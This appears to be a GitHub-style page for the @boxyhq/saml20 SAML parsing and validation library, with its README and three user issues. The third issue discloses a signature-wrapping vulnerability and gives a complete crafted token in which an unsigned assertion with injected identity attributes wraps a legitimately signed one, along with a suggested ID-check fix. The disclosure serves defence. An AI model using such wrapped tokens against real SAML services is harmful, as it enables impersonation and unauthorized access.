
saml20's Introduction

SAML 2.0 & 1.1 Assertion Parser & Validator


boxyhq/saml20 is a fork of a fork of saml20. It now has extended functionality and diverges from the original, unmaintained library. The new package is published at https://www.npmjs.com/package/@boxyhq/saml20

Installation

$ npm install @boxyhq/saml20

Usage

[DEPRECATED] saml.parse(rawAssertion, cb)

rawAssertion is the SAML Assertion in string format.

Parses the rawAssertion without validating signature, expiration or audience. It lets you read information from the token, such as the Issuer name, in order to select the right public key for validating the token in a multi-provider scenario.

var saml = require('@boxyhq/saml20').default;

saml.parse(rawAssertion, function (err, profile) {
  // err is set when the assertion could not be parsed; profile is then undefined.

  var claims = profile.claims; // Array of user attributes.
  var issuer = profile.issuer; // String Issuer name.
});

saml.parseIssuer(rawAssertion)

rawAssertion is the SAML Assertion in string format.

Parses the rawAssertion without validating signature, expiration or audience and returns only the Issuer name as a string.

const issuer = saml.parseIssuer(rawAssertion);

saml.validate(rawAssertion, options, cb)

rawAssertion is the SAML Assertion in string format.

options:

  • thumbprint is the thumbprint of the trusted public key. The library reads the public key embedded in the assertion and accepts it only if its thumbprint matches this value.
  • publicKey is the trusted public key.
  • audience (optional). If it is included, audience validation takes place.
  • bypassExpiration (optional). This flag bypasses expiration validation (useful for testing, not recommended in production environments).

You can use either thumbprint or publicKey but you should use at least one.

var saml = require('@boxyhq/saml20').default;

var options = {
  thumbprint: '1aeabdfa4473ecc7efc5947b18436c575574baf8',
  audience: 'http://myservice.com/',
};

saml.validate(rawAssertion, options, function (err, profile) {
  // err is set when the signature, expiration or audience check fails; profile is then undefined.

  var claims = profile.claims; // Array of user attributes.
  var issuer = profile.issuer; // String Issuer name.
});

or using publicKey:

var saml = require('@boxyhq/saml20').default;

var options = {
  publicKey: 'MIICDzCCAXygAwIBAgIQVWXAvbbQyI5Bc...',
  audience: 'http://myservice.com/',
};

saml.validate(rawAssertion, options, function (err, profile) {
  // err is set when the signature, expiration or audience check fails; profile is then undefined.

  var claims = profile.claims; // Array of user attributes.
  var issuer = profile.issuer; // String Issuer name.
});

Tests

Configure test/lib.index.js

In order to run the tests you must configure lib.index.js with these variables:

var issuerName = 'https://your-issuer.com';
var thumbprint = '1aeabdfa4473ecc7efc5947b19436c575574baf8';
var certificate = 'MIICDzCCAXygAwIBAgIQVWXAvbbQyI5BcFe0ssmeKTAJBgU...';
var audience = 'http://your-service.com/';

You also need to include a valid and an invalid SAML 2.0 token in test/assets/validToken.xml and test/assets/invalidToken.xml, for example:

<Assertion ID="_1308c268-38e2-4849-9957-b7babd4a0659" IssueInstant="2014-03-01T04:04:52.919Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"><Issuer>https://your-issuer.com/</Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /><ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256" /><ds:Reference URI="#_1308c268-38e2-4849-9957-b7babd4a0659"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature" /><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256" /><ds:DigestValue>qJQjAuaj7adyLkl6m3T1oRhtYytu4bebq9JcQObZIu8=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>amPTOSqkEq5ppbCyUgGgm....</Assertion>

To run the tests use:

$ npm test

Contributing

Thanks for taking the time to contribute! Contributions are what make the open-source community such an amazing place to learn, inspire, and create. Any contributions you make will benefit everybody and are appreciated.

Please try to create bug reports that are:

  • Reproducible. Include steps to reproduce the problem.
  • Specific. Include as much detail as possible: which version, what environment, etc.
  • Unique. Do not duplicate existing opened issues.
  • Scoped to a Single Bug. One bug per report.

Community

  • Discord (For live discussion with the Community and BoxyHQ team)
  • Twitter (Get the news fast)

Reporting Security Issues

Responsible Disclosure

License

MIT


saml20's Issues

Error xml not parsed correctly

I was testing out the SAML Jackson demo with Express, and my identity provider (Salesforce) returned an XML response that was not correctly handled and threw an exception.

This is all demo data, so it is not sensitive and I am posting everything here.

  1. I am redirected to the identity provider to log in
  2. I am redirected back to my app
  3. The response is not handled

The line if (assertion[0]) { throws because assertion is undefined.


Here is my config on the identity provider


Here is the raw response I got while debugging the response

<?xml version="1.0" encoding="UTF-8"?>
<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="http://localhost:3000/sso/acs" ID="_fc480a2ce1ccfca5ea037230ac366c461648046513607" InResponseTo="_5da30a190be9073a53e6" IssueInstant="2022-03-23T14:41:53.607Z" Version="2.0">
   <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity">https://d6g000008kx1jeag-dev-ed.my.salesforce.com</saml:Issuer>
   <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
         <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" />
         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" />
         <ds:Reference URI="#_fc480a2ce1ccfca5ea037230ac366c461648046513607">
            <ds:Transforms>
               <ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature" />
               <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#">
                  <ec:InclusiveNamespaces xmlns:ec="http://www.w3.org/2001/10/xml-exc-c14n#" PrefixList="ds saml samlp" />
               </ds:Transform>
            </ds:Transforms>
            <ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" />
            <ds:DigestValue>AUjbIyf7Q2ncY8dXZOHJiHziKB8=</ds:DigestValue>
         </ds:Reference>
      </ds:SignedInfo>
      <ds:SignatureValue>ckmokmyowhi+q/hSwXFHIhcvP4OHdF4XLNOgZRUkijnu9Dnm+7bmUeWNMDC7QYxgKeCD/Bi4mYZunm/usvaZabs4ZHNhN1nRK/6OR7HJEBXq0E2dazT9JTaurSr2By77iO3jsaEbgk/4cXE1tU0eXgnypl9PhKIHuxkLdxpIE0rsyu1oER1I9ed78mPmydmnNRCgEeNyIw70cHhAJQp1TImu1bILvHfuC9Xh9lt/4wvh0YKyT4Hv3CDa7LZ4U9SpAxx3Lp0I8wc1dPmpVrT+Lck3oqOVL1vh855PGY/+dcHanudCbltA3+hK5J+MSj+LvE9KiLmL/0oDiAH8xt6iUw==</ds:SignatureValue>
      <ds:KeyInfo>
         <ds:X509Data>
            <ds:X509Certificate>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</ds:X509Certificate>
         </ds:X509Data>
      </ds:KeyInfo>
   </ds:Signature>
   <samlp:Status>
      <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:AuthnFailed" />
   </samlp:Status>
</samlp:Response>

Here is my metadata

<?xml version="1.0" encoding="UTF-8"?><md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="https://d6g000008kx1jeag-dev-ed.my.salesforce.com" validUntil="2032-03-23T15:00:03.595Z" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
   <md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
      <md:KeyDescriptor use="signing">
         <ds:KeyInfo>
            <ds:X509Data>
               <ds:X509Certificate>MIIErDCCA5SgAwIBAgIOAXwS/tj4AAAAACIiWw4wDQYJKoZIhvcNAQELBQAwgZAxKDAmBgNVBAMMH1NlbGZTaWduZWRDZXJ0XzIzU2VwMjAyMV8xNDExMDMxGDAWBgNVBAsMDzAwRDZnMDAwMDA4S1gxajEXMBUGA1UECgwOU2FsZXNmb3JjZS5jb20xFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xCzAJBgNVBAgMAkNBMQwwCgYDVQQGEwNVU0EwHhcNMjEwOTIzMTQxMTA0WhcNMjIwOTIzMTIwMDAwWjCBkDEoMCYGA1UEAwwfU2VsZlNpZ25lZENlcnRfMjNTZXAyMDIxXzE0MTEwMzEYMBYGA1UECwwPMDBENmcwMDAwMDhLWDFqMRcwFQYDVQQKDA5TYWxlc2ZvcmNlLmNvbTEWMBQGA1UEBwwNU2FuIEZyYW5jaXNjbzELMAkGA1UECAwCQ0ExDDAKBgNVBAYTA1VTQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAI0nTBaVpfpiwvOxSkev4Ya8Qx3E/oyFTfnIkgpM4whqIl8XiSTTHlLCBU5q/p9xvQb5f0JvMwF+1CR4N/QDXCLGSqQAv4gQ2rGNFh75AbquTRAq9OXPzT028js788smNwOUM2DHRjBRk1qrgF/34q03IomxDNEpYQhyZvz+l7eT7FJuRLspnjAB+9ir7V4OV1+TbHlwXT2kIHlOLxEm4ReXiNx6AadJ/dKGUKb41upWBUSoXLJQWp8gCBc9I861NkeZUp0/fIZFhSHT3oTjt9gnok+n4uEpJhDVClY9nAk0Ojhyto/spGT7ADvYFJYxgE+gcuGbKQelKaocz1y26EsCAwEAAaOCAQAwgf0wHQYDVR0OBBYEFGu2HBY9dd5f3vXxcPxtULNi6r2HMA8GA1UdEwEB/wQFMAMBAf8wgcoGA1UdIwSBwjCBv4AUa7YcFj113l/e9fFw/G1Qs2LqvYehgZakgZMwgZAxKDAmBgNVBAMMH1NlbGZTaWduZWRDZXJ0XzIzU2VwMjAyMV8xNDExMDMxGDAWBgNVBAsMDzAwRDZnMDAwMDA4S1gxajEXMBUGA1UECgwOU2FsZXNmb3JjZS5jb20xFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xCzAJBgNVBAgMAkNBMQwwCgYDVQQGEwNVU0GCDgF8Ev7Y+AAAAAAiIlsOMA0GCSqGSIb3DQEBCwUAA4IBAQAYHj5lRQhAlypIRvlg9Y7O3RiVrPNnDGY5XgQL1paHcjyhjwaAYg8koDoy4jbwCC1JjuJSKvJoGE2uP+rOqNNFjJURo5ztWWD0ZtPlHB0QbRrnPSpuc3eqb2hSY2bLFurPlNXFt/b4h0nzRi80wXqfUz+YBTxlmOJcTvYy0Pmfq1CwkXpQp1GZ2H1yUXRrAT2JDr7U1DxOm913J+oMoIxFCZFNuEXRvInLEemYH1/cqJfYBviG0EqU1M2eSFp/OZO3MskMztSecpSgFxbAmakWIb6bIXHl9id2w6ZZ0OpSLP8YkQcHYnUoeWp65envajsxhYH3c0BFSTtEcurOLVYS</ds:X509Certificate>
            </ds:X509Data>
         </ds:KeyInfo>
      </md:KeyDescriptor>
      <md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>
      <md:SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Location="https://d6g000008kx1jeag-dev-ed.my.salesforce.com/idp/endpoint/HttpPost"/>
      <md:SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="https://d6g000008kx1jeag-dev-ed.my.salesforce.com/idp/endpoint/HttpRedirect"/>
   </md:IDPSSODescriptor>
</md:EntityDescriptor>

`&#13;` in SAML response not sanitized before validation

Summary

When validating a SAML response, if a line break in the response is encoded as &#13; instead of &#xD;, it is not sanitized and the validation fails.

Environment in which the event occurred

  • Browser: Microsoft Edge on Windows 10
  • Execution environment: Next.js application on WSL

Related Library Versions

"@boxyhq/saml20": "1.5.1"
"@boxyhq/saml-jackson": "1.26.1"
"next-auth": "4.24.7"

Detailed Situation

In the case at issue, the X509Certificate portion of the xml argument passed to the validateSignature.hasValidSignature method represented line breaks as &#13;.
This representation is not sanitized before use and therefore fails validation.

Actual response data (excerpts)

<KeyInfo><X509Data><X509Certificate>MIID2TCCAsGgAwIBAgIBAzANBgkqhkiG9w0BAQsFADBvMQswCQYDVQQGEwJKUDERMA8GA1UECAwI&#13;
SE9ra2FpZG8xFDASBgNVBAcMC1NBUFBPUk8tU0hJMSowKAYDVQQKDCFIb2trYWlkbyBFbGVjdHJp&#13;
YyBQb3dlciBDby4sIEluYy4xCzAJBgNVBAMMAmNhMCAXDTIxMDMwMzAwMzgyMVoYDzIwNTEwMjI0&#13;
MDAzODIxWjByMQswCQYDVQQGEwJKUDERMA8GA1UECAwISE9ra2FpZG8xKjAoBgNVBAoMIUhva2th&#13;
...
vs1WiMb2KXjA5d/xGzkvmxl9Ng6Ama6p3sg38AaLcB72WCNRo5PSYL3aRta5GyfaIAeohJk1Lne+&#13;
neTrBOIBI/dbYuEe9oHPr/IW9fffE4X0iGqBVMy4UzMxIM/DNEmcp7ixVm/u6ybCDbGVWBezSVFy&#13;
SBDO6kbSaR5BAQlvMoF9+3Wixyv7Q3JomUDe7nnp2JrSvh2T1+8tFQWkEa9/1JkJT3O6XrBeY8Me&#13;
n4P9U4e8TThs3VH1lBRV8T1NYUs=</X509Certificate></X509Data></KeyInfo>

Proposed Solution

By manually modifying the contents under node_modules for testing, the following adjustment was found to resolve the issue:

Current line:

xml = xml.replace(/&#x(d|D);/gi, '');

Suggested modification:

xml = xml.replace(/(&#x(d|D);|&#13;)/gi, '');

This modification ensures that &#13; is appropriately sanitized, allowing the validation to proceed correctly.

validate is subject to signature wrapping attacks

Signature wrapping scenarios described at: https://blog.ritvn.com/testing/2018/02/16/burp-suite-saml-signature-wrapping-attack.html

How to reproduce

The following token will validate and return the attributes in the evil assertion in the profile:

<Assertion ID="evil_assertion" IssueInstant="2014-08-14T15:34:11.070Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"><Issuer>https://identity.kidozen.com/</Issuer><AttributeStatement><Attribute Name="http://schemas.kidozen.com/domain"><AttributeValue>badapple.com</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name"><AttributeValue>Bad Apple</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress"><AttributeValue>[email protected]</AttributeValue></Attribute></AttributeStatement><Assertion ID="_01e2c88f-2d05-4696-91dc-29224ab936f4" IssueInstant="2014-08-14T15:34:11.070Z" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"><Issuer>https://identity.kidozen.com/</Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /><ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256" /><ds:Reference URI="#_01e2c88f-2d05-4696-91dc-29224ab936f4"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature" /><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256" /><ds:DigestValue>nq7o8ocpDthu2hjoc+zoqmdaK30kLIL7ojcR0xu7rgo=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>Q9Qdvao8YFWwITmelJxGWNn+upMreNMVCX60JtEtddzC+lGEFRk2pDFMETsoTqvjAC5sIbaqPBKfaLusds2rqX1JhwntkJca65jSDSvA3mukidFTcK8UomsTpQczzv/PvQrx6AmIjrX5Ibt0Vs25EFd9bqBjlWF6u1EJntL4G2s=</ds:SignatureValue><KeyInfo xmlns="http://www.w3.org/2000/09/xmldsig#"><X509Data><X509Certificate>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</X509Certificate></X509Data></KeyInfo></ds:Signature><Subject><SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer" /></Subject><Conditions NotBefore="2014-08-14T15:34:11.070Z" 
NotOnOrAfter="2014-08-14T16:34:11.070Z"><AudienceRestriction><Audience>http://demoscope.com</Audience></AudienceRestriction></Conditions><AttributeStatement><Attribute Name="http://schemas.kidozen.com/domain"><AttributeValue>kidozen.com</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name"><AttributeValue>John Admin</AttributeValue></Attribute><Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress"><AttributeValue>[email protected]</AttributeValue></Attribute></AttributeStatement></Assertion></Assertion>

Fix suggestion

xml-crypto itself suggests that additional checks need to be performed to make sure that the content you use is the content that has been signed:

var elem = select(doc, "/xpath_to_interesting_element");
var uri = sig.references[0].uri; // might not be 0 - depending on the document you verify
var id = (uri[0] === '#') ? uri.substring(1) : uri;
if (elem.getAttribute('ID') != id && elem.getAttribute('Id') != id && elem.getAttribute('id') != id)
  throw new Error('the interesting element was not the one verified by the signature')

Therefore, when parsing the profile information, saml20-maintained needs to check that the ID of the element used is the same as the one returned in the signed object after calling signed.checkSignature(xml), as per:

const uri = signed.references[0].uri;
const id = (uri[0] === '#') ? uri.substring(1) : uri;
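The check the issue asks for, carried through as an added example that is not code from the issue, from xml-crypto or from saml20: resolve the Assertion through the verified Reference instead of taking the first one in document order, and reject ID collisions. Elements are modelled as plain objects exposing getAttribute(), the shape the xml-crypto snippet above works on; the IDs and names come from the issue's sample token, and the helper names are mine.

```javascript
// Added example (not from the issue, xml-crypto or saml20): pick the
// <Assertion> the signature actually covers rather than the first one found.

// A same-document Reference URI looks like "#<ID>"; return the bare ID.
function referencedId(uri) {
  if (typeof uri !== 'string' || uri === '') {
    throw new Error('signature Reference has no same-document URI');
  }
  return uri[0] === '#' ? uri.substring(1) : uri;
}

// Return the single element whose ID/Id/id attribute equals the signed
// reference. Zero matches means the signed element is missing; more than
// one means an ID collision, which a wrapped document can produce.
function selectSignedElement(elements, references) {
  if (!Array.isArray(references) || references.length !== 1) {
    throw new Error('expected exactly one signed Reference');
  }
  const id = referencedId(references[0].uri);
  const matches = elements.filter((el) =>
    ['ID', 'Id', 'id'].some((attr) => el.getAttribute(attr) === id));
  if (matches.length !== 1) {
    throw new Error(`expected one element with ID ${id}, found ${matches.length}`);
  }
  return matches[0];
}

// Constructed stand-ins for the two Assertion elements in the issue's token.
function element(attrs, name) {
  return {
    name, // value of the .../claims/name attribute, for illustration only
    getAttribute: (key) => (key in attrs ? attrs[key] : null),
  };
}
const SIGNED_ID = '_01e2c88f-2d05-4696-91dc-29224ab936f4';
const ASSERTIONS = [
  element({ ID: 'evil_assertion' }, 'Bad Apple'), // outer, unsigned
  element({ ID: SIGNED_ID }, 'John Admin'),        // inner, signed
];
const SIGNED_REFERENCES = [{ uri: '#' + SIGNED_ID }];

// What the issue describes: the first Assertion wins, so the injected one does.
function naiveProfileName(elements) {
  return elements[0].name;
}

// The fix: resolve the element through the verified Reference first.
function safeProfileName(elements, references) {
  return selectSignedElement(elements, references).name;
}
```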
